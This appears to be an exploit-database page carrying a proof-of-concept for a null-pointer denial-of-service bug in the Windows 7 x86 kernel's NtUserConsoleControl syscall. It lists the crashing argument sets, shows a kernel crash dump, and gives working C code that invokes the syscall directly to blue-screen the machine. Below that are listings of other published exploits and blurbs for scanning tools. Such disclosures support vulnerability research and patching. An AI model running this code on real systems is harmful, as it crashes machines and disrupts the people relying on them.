Menu

Search for hundreds of thousands of exploits

"Microsoft Windows Kernel - 'win32k!NtUserConsoleControl' Denial of Service (PoC)"

Author

Exploit author

vportal

Platform

Exploit platform

windows

Release date

Exploit published date

2018-07-30

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
/*
# Exploit Title: Microsoft Windows Kernel - 'win32k!NtUserConsoleControl' Denial of Service (PoC)
# Author: vportal
# Date: 2018-07-27
# Vendor homepage: http://www.microsoft.com
# Version: Windows 7 x86
# Tested on: Windows 7 x86
# CVE: N/A

# It is possible to trigger a BSOD caused by a Null pointer deference when calling the system 
# call NtUserConsoleControl with the following arguments:

# NtUserControlConsole(1,0,8).
# NtUserControlConsole(4,0,8).
# NtUserControlConsole(6,0,12).
# NtUserControlConsole(2,0,12).
# NtUserControlConsole(3,0,20).
# NtUserControlConsole(5,0,8).

# Different crashes are reproduced for each case. For the second case the crash is showed below:
# EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - La instrucci n en 0x%08lx hace referencia a la memoria 
# en 0x%08lx. La memoria no se pudo %s.
# FAULTING_IP:
# win32k!xxxSetConsoleCaretInfo+c
# 93310641 8b0e            mov     ecx,dword ptr [esi]

# TRAP_FRAME:  8c747b2c -- (.trap 0xffffffff8c747b2c)
# ErrCode = 00000000
# eax=00000000 ebx=00000000 ecx=84fc9100 edx=00000000 esi=00000000 edi=00000003
# eip=93310641 esp=8c747ba0 ebp=8c747bb0 iopl=0         nv up ei ng nz ac po nc
# cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010292
# win32k!xxxSetConsoleCaretInfo+0xc:
# 93310641 8b0e            mov     ecx,dword ptr [esi]  ds:0023:00000000=????????
# Resetting default scope

# CUSTOMER_CRASH_COUNT:  1
# DEFAULT_BUCKET_ID:  VISTA_DRIVER_FAULT
# BUGCHECK_STR:  0x8E
# PROCESS_NAME:  Win32k-fuzzer_

# CURRENT_IRQL:  0
# LAST_CONTROL_TRANSFER:  from 9330fc27 to 93310641

# STACK_TEXT: 
# 8c747bb0 9330fc27 00000000 00000003 00000014 win32k!xxxSetConsoleCaretInfo+0xc
# 8c747bcc 9330fa8d 00000003 00000000 00000014 win32k!xxxConsoleControl+0x147
# 8c747c20 82848b8e 00000003 00000000 00000014 win32k!NtUserConsoleControl+0xc5
# 8c747c20 012e6766 00000003 00000000 00000014 nt!KiSystemServicePostCall
# WARNING: Frame IP not in any known module. Following frames may be wrong.
# 0016f204 00000000 00000000 00000000 00000000 0x12e6766

# PoC code:
*/

#include <Windows.h>

extern "C"

ULONG CDECL SystemCall32(DWORD ApiNumber, ...) 
{
__asm{mov eax, ApiNumber};
__asm{lea edx, ApiNumber + 4};
__asm{int 0x2e};
}


int _tmain(int argc, _TCHAR* argv[])
{

int st = 0;
int syscall_ID = 0x1160; //NtUserControlConsole ID Windows 7

LoadLibrary(L"user32.dll");

st = (int)SystemCall32(syscall_ID, 4, 0, 8);

return 0;
}

# The vulnerability has only been tested  in Windows 7 x86.
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2019-12-20 "Microsoft Windows 10 BasicRender.sys - Denial of Service (PoC)" dos windows vportal
2018-07-30 "Microsoft Windows Kernel - 'win32k!NtUserConsoleControl' Denial of Service (PoC)" dos windows vportal
2018-05-13 "Microsoft Windows 2003 SP2 - 'RRAS' SMB Remote Code Execution" remote windows vportal
2017-04-25 "Microsoft Windows 2003 SP2 - 'ERRATICGOPHER' SMB Remote Code Execution" remote windows vportal
2016-12-05 "Dup Scout Enterprise 9.1.14 - Remote Buffer Overflow (SEH)" remote windows vportal
2016-12-05 "DiskBoss Enterprise 7.4.28 - 'GET' Remote Buffer Overflow" remote windows vportal
2016-12-01 "Disk Savvy Enterprise 9.1.14 - 'GET' Remote Buffer Overflow" remote windows vportal
2016-07-29 "VUPlayer 2.49 - '.pls' File Stack Buffer Overflow (DEP Bypass)" local windows vportal 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected